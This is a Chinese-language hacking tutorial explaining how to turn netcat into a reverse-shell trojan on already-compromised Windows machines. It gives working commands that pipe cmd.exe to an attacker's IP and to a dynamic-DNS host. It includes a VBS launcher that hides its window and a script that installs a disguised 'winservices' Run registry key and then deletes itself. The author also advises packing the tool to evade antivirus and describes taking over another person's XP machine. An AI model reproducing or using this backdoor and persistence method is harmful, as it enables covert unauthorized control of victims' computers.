利用NC 來制作自己的反彈木馬免責申明:我也是第一次公開寫這樣的東西, 不過寫此文的目的是為了技術上的研究, 把我自己的一些方法和技巧講出來, 和大家一起探討, 希望大家能提出意見. 并不是教大家如何

利用NC 來制作自己的反彈木馬

免責申明:我也是第一次公開寫這樣的東西, 不過寫此文的目的是為了技術上的研究, 把我自己的一些方法和技巧講出來, 和大家一起探討, 希望大家能提出意見. 并不是教大家如何利用此方法去破壞別人的電腦! 請不要用于非法目的, 否 則一切責任自負與我無關, 呵呵~~~我可不想做黑鷹的大米呀.

一、必須掌握的基礎知識；

NC 這個工具對于一個黑客來說再熟悉不過了, 可以說是每個黑客必備工具之一, 被稱做黑客的一把瑞士軍刀! 可見其地位之高. 大家有興趣的話自己去看一下有關NC 的一些詳細用法吧, 我在這里就不多說了, 這不是我這次要講的主題, 我只把其中我用到的一些參數介紹給大家.NC 并不是一個圖形界面的工具, 但它 有很強大的正向鏈接、反向鏈接、掃描和監(jiān)聽PORT 等功能！

對于木馬，它的種類也有很多，但最讓人喜歡的還是具有反彈功能的木馬，它可以讓我們一勞永逸，一次種植成功以后便自動找上門來，呵呵~~~事半功倍呀！這也是我喜歡反向鏈接木馬的一個原因。（對于正向鏈接我最喜歡的一個工具就是radmin ，原因就是它不會被殺。）至于如何讓別人中了你的木馬、如何去入侵對方，然后給他種馬我就不說了（這也不是我這次要說的主題）方法和手法有很多，就看你的技術了。當你成功入侵一臺機子后，你想做的事當然是永遠的抓住它，不要讓他輕易的溜走，那就趕快上傳你自己的木馬吧！這是我的通常做法。這時一個優(yōu)秀的木馬會給我們很大幫助。

還是來說NC 吧。它的使的格式是這樣的，在CMD 下輸入：NC.EXE [參數1] [參數2] …… 主機名（或IP ）。

NC 有很多的參數，它的功能就體現(xiàn)在這些參數上。這里有幾個要用到的、必需掌握的參數給大家簡略的介紹一下：

-l 監(jiān)聽模式，可以監(jiān)聽本地的PORT 即端口；

-p 設置端口，后加端口號；

-v 顯示詳細信息，

-vv 顯示更詳細信息；

-t 以telnet 交互方式來回應；

-e 程序重定向，可以把目標機的CMD 重定向到一個端口上，然后我們在本機進行監(jiān)聽，這樣就可以得到目標機的SHELL 了，具體看后面我講的例子吧；

-d 后臺模式；主要的參數就這么多吧，我們通過下面的例 子來一步一步學習吧！

二、簡單的幾個例子；

例如對本機TCP 端口90的監(jiān)聽：nc.exe -l -v -p 90 127.0.0.1 意思是 臨聽本機的TCP 端口90（如圖1）。

（在這里如果是本機的話，可以省去主機名或IP ，即不寫127.0.0.1這時默認就是本機。還有默認情況下-p 端口就指的是TCP 如果要臨聽UDP 端口，則要加-u 參數?。┪覀儊眚炞C一下結果，看是不是真的監(jiān)聽我們本機的90端口，先不運行NC 我們用netstat -an這個命令來查看一下本機的端口，結果（如圖2）

沒有發(fā)現(xiàn)TCP90端口被開放，我們運行nc.exe -l -v -p 90這樣一個命令后，這時不要關閉這個監(jiān)聽窗口，再開一個CMD ，然后再用nbtstat -an來查看本機 所開放的端口，這時會發(fā)現(xiàn)TCP90端口被打開（如圖3）

如果你有fport 這個工具的話，你還可以進一步查看到是哪個程序打開了本機 TCP90端口！（如圖4）

（關于nbtstat 和fport 我就不做介紹了）。先來看一個正向鏈接的例子，當我們成功進入別人的機子并上傳了NC 后，可以用這樣一個命令來實現(xiàn)正向鏈接，（假設目標機的IP 為222.91.203.208）在目標機上運行nc 127.0.0.1 123 -e cmd.exe即把它的cmd 定向到它自己的123端口上。那么我們在本機上就可以用nc -l -v 222.91.203.208 -p 123來監(jiān)聽它的123端口，從而得到對方的cmd 。或者用這樣簡單的命令來把CMD 定向到99端口:nc -l -p 99 -t -e cmd.exe 然后我們在本機上用telnet 來鏈接目標機, 同樣可以得到對方的shell. 比如目標機的IP 為:192.168.199.1,那么我們用telnet 192.168.199.1 99來鏈接對方!(如圖5).

以上就是兩個正向鏈接的例子, 其實也很簡單, 相信到此大家對nc 應該有了一個 大概的了解了吧? 接下來我想重點說說它的反向鏈接功能。

三、反向鏈接的實現(xiàn)；

所謂反向鏈接, 簡單的說就是目標機主動來鏈接我們的機子, 而不用我們主動去找他, 這樣我們就省事的多了, 當目標機上線后會自動來鏈接我們設定的端口(這算是我個人的理解吧, 我也沒有一個準確的定義). 我們下面一步步來解實現(xiàn), 一步步來解決其中出現(xiàn)的問題, 最終實現(xiàn)我們的目的!

一個簡單的例子, 假設我們的IP 為:219.144.20.42 那么在目標機上我們可以用這樣的命令來實現(xiàn)反彈:nc -t -e cmd.exe 219.144.20.42 99(如圖6).

它的意思就是, 把cmd 定向在219.144.20.42(我們機子) 的99端口上, 那么我們在本機上直接監(jiān)聽99端口, 就可的到shell,nc -l -p 99(如圖7)

(一點說明, 就是以上操作應當先在本機監(jiān)聽, 然后在目標機上執(zhí)行重定向, 這樣才能實現(xiàn)反彈!). 以上反彈的實現(xiàn)看起來很容易就能實現(xiàn), 但細想一下, 在我們實際情況中并不是這樣簡單的, 首先這樣的反彈只是一次性的! 因為對方和我們一般來說都是個人用戶, 都是動態(tài)的IP, 重啟后下次就不能用nc -t -e cmd.exe 219.144.20.42 99來和我們進行鏈接, 因為我們的IP 地址已經發(fā)生了變化! 而且我們也不可能當我們的IP 地址每變一次, 我們就去入侵他一次, 然后改變我們剛才的IP 地址, 這是不現(xiàn)實的. 那么怎樣來解決這一問題呢? 怎樣才能讓它, 當我們的IP 發(fā)生變化后仍然可以實現(xiàn)把它的shell 反彈到我們的機子上來呢?

這是關鍵的一步, 為此我也曾冥思苦想, 好長時間沒有想出一個解決的辦法. 也沒有人告訴我該怎么做! 不過我并沒有因此而放棄, 我用nc 本身所帶的參數并不能實現(xiàn)我所要的功能, 于是我把思路轉在了nc 之外, 很快我想到" 域名轉向" 這個方法, 即使用動態(tài)域名! 呵呵~~我終于成功了, 功夫不負有心人啊, 真的是有感而發(fā). 我使用的是希網網絡提供的免費動態(tài)域名, 大家可以到3322.org 這個網上去注冊一個! 注冊成功后會得到一個:用戶名.3322.org 的動態(tài)域名, 然后下載客戶端軟件, 便可實現(xiàn)了!(關于動態(tài)域名的一些知識以及如何申請、使用客戶端我在這里就不講了, 我只能說這不是我要講的主題，有興趣的朋友可以自己去試一下，很簡單的) 。我申請的是godya.3322.org 并在本機上安裝客戶端軟件（如圖8）。

這樣我們就可以用以下命令來實現(xiàn)反彈:nc -t -e cmd.exe godya.3322.org 7788 -d 我想大家一定能明白這行命令的意思吧？就是將本機的cmd 重定向在godya.3322.org 的7788端口上，這里的godya.3322.org 就是我注冊的動態(tài)域名轉向了，因此無論我的IP 如何變化都能夠轉到我的機子上來，只要在我的機子上監(jiān)聽7788端口便可以了，這樣就實現(xiàn)了反彈的目的了，呵呵~~~現(xiàn)在想來其實也很簡單的了，我基本什么也沒有做！到此可以說理論上已經完成了，下 一步就是怎樣來完善了。

四、用VBS 編程來實現(xiàn)

通過剛才的例子我們可以知道，只用nc -t -e cmd.exe godya.3322.org 7788 -d這樣一句命令就可以實現(xiàn)反向鏈接了，那么如何讓目標機一開機就把它的cmd 定向到我的機子上來了呢? 很多朋友會立刻想到用批處理來實現(xiàn), 這的確是一個不錯的主意, 用批處理最簡單、最容易實現(xiàn)，對我們來說也是比較的熟悉。但是用批處理有一個弊端，就是當我們把以上命令存為一個批處理文件并運行這個批處理時，會有一個DOS 窗口一閃而過，雖然來不及看是什么，但別人一看也就明白了，這樣很容易就會被發(fā)現(xiàn)！那么如何來避免呢？我采取的是用VBS 來編程實現(xiàn)，使用它的好處就是它不會彈出DOS 窗口，同樣能夠完成批處理的功能。（關于VBS 的一些知識我不能在這里給大家介紹了，雖然我是只懂得一點點，但說起來恐怕真的三天也講不明白個所以然，會影響了我要說的主題，也恐怕會引起一些人的不滿，說我盡說些無關的話題，所以我寫的程序我就不做詳細解釋了，如果看不懂的話可以照搬我程序，請大家原諒！）請將以下程序另存為nc.vbs 然后和nc.exe 一起存放在目標機的systemrootsystem32下即可，然后我們在本機上監(jiān)聽7788端口，在目標機上運行nc.vbs 就能得到對方的shell 。

nc.vbs 程序內容如下：

dim wshell

set wshell=CreateObject("wscript.shell")

wshell.run "nc -t -e cmd.exe godya.3322.org 7788 -d",0,true 上面的程序其實就是執(zhí)行了nc -t -e cmd.exe godya.3322.org 7788 –d

這樣一條語句。 當我們成功的把nc.vbs 和nc.exe 上傳到目標機上后，下一步如何讓它實現(xiàn)自動運行的方法就有很多了，我想大家也能想到一些辦法的，還是看我的一個具體實例吧。前提是我已經通過其它方法成功進入了別人的一臺機子，并用radmin 建立了正向鏈接，而且也已經上傳了nc.vbs 和nc.exe 這個不說了，看圖吧（如圖9）。

接下來我在我的機子上開始監(jiān)聽7788端口（如圖10）。

我通過radmin 的遠程telnet 功能在目標機上運行nc.vbs ，然后就在我的機子上到得了對方的shell （如圖11），

從圖中大家也可以看得出，我的機子是2000系統(tǒng)而對方的是XP ！既然我得到了對方的shell 那么我就可以想做什么做什么了，呵呵~~。進一步查看一下對方的機子吧，我查看了一下他機子的boot.ini 發(fā)現(xiàn)這是一臺xp Home Edition版的機子（如圖12）。

我下步要做的就是把nc.vbs 添加到目標機的autoexec.bat 中，目的就是讓它開機自動運行，來實現(xiàn)真正的反彈呀！呵呵`~~~。我通過echo 命令結合>>來給

它添加（如圖13）。

讓它自動運行的方法有很多種，剛才我用的是修改autoexec.bat 的方法來實現(xiàn)，我再講一下添加注冊表的方法吧，我同樣用vbs 來完成。我們知道如果在注冊表中HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun這個位置添加鍵值，便會開機自動運行。所以我就用vbs 程序來在以上位置添加nc.vbs ，文件名為auto.vbs 。為了更加的隱蔽，我又添加了能實現(xiàn)自我刪除的功能，就是當運行完auto.vbs 文件后它首先會將systemrootsystem32nc.vbs添加到注冊表中Run 下，然后就自我刪除！為了實現(xiàn)能夠自我刪除，我也想了好長時間、好多辦法最后終于成功了，可能我的方法不是很正規(guī)和科學，但因水平有限只能暫且這樣了，呵呵~~~看程序吧，

將以下程序保存為auto.vbs 。內容如下： Dim AutoR

Set AutoR=WScript.CreateObject("WScript.Shell")

RegPath="HKLMSoftwareMicrosoftWindowsCurrentVersionRun"

Type_Name="REG_SZ" Key_Name="winservices"

Key_Data="SystemRootsystem32nc.vbs"

AutoR.RegWrite RegPath&Key_Name,Key_Data,Type_Name

Dim delself

Set delself = WScript.CreateObject ("WSCript.shell")

delself.run "COMSPEC /c del auto.vbs",0,true

那么當我們把nc.exe 和nc.vbs 存放在目標機的SystemRootsystem32下以后，就可以在目標機上直接運行auto.vbs （位置可以任意，但文件名必須與程序內的一至，否則不能完成自我刪除?。?。它會自動在注冊表中新建一個名為winservices 的鍵值，并將值設為SystemRootsystem32nc.vbs這樣就將nc.vbs 添加到了注冊表中（如圖14）。

這樣一來我們就比較的省事了，而且運行完auto.vbs 文件后它就刪除了自己，使我們的木馬更加的隱蔽！

五、總結；

每次到此都要總結一下，這似乎成了習慣，總想再說幾句。為了寫這個教程我也花了很大的功夫，也花了很多的時間，我這一講主要針對的是菜鳥入門級的朋友，所以在講的過程中我盡力把一些需要掌握的東西講清楚、講詳細希望大多數朋友都能夠接受。當然在其中可能有一些象vbs 、域名轉向、nc 的一些參數等等可能不容易理解，但我想只要你認真、仔細的去看我的每一步操作過程應當也不會覺得太難，所以希望大家多動手實踐，有條件的可以一步步的試驗一下，這樣理解起來也容易些，說不定你也會有自己不同的方法和收獲。感謝 閱讀！

申明：nc.exe 會被一般殺毒軟件當做一個hacktools （黑客工具）而殺掉，如果你想不被殺的話，就請自己動手加殼或加花吧，我在這里就不說具體的過程了

（由于這是本人原創(chuàng)有描述或技術上的錯誤請指出?。r鷹

本文用到的工具

nc http://www.400gb.com/file/73430433

Radmin3.2影子版注冊版 http://www.400gb.com/file/73430469

其他一些遠控實用工具：http://www.400gb.com/file/73430589